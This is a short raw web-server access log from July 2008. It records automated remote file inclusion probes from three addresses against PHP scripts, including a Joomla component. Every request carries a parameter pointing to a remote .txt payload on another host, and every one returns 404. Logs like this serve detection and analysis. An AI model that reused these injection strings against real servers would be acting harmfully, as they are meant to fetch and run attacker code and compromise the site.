59.126.172.166 - - [10/Jul/2008:22:15:35 -0500] "GET /logs//errors.php?error=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
59.126.172.166 - - [10/Jul/2008:22:15:36 -0500] "GET //errors.php?error=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
195.34.175.196 - - [10/Jul/2008:22:15:42 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
195.34.175.196 - - [10/Jul/2008:22:15:42 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
75.102.21.29 - - [10/Jul/2008:22:16:44 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
75.102.21.29 - - [10/Jul/2008:22:16:44 -0500] "GET //faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
75.102.21.29 - - [10/Jul/2008:22:16:44 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
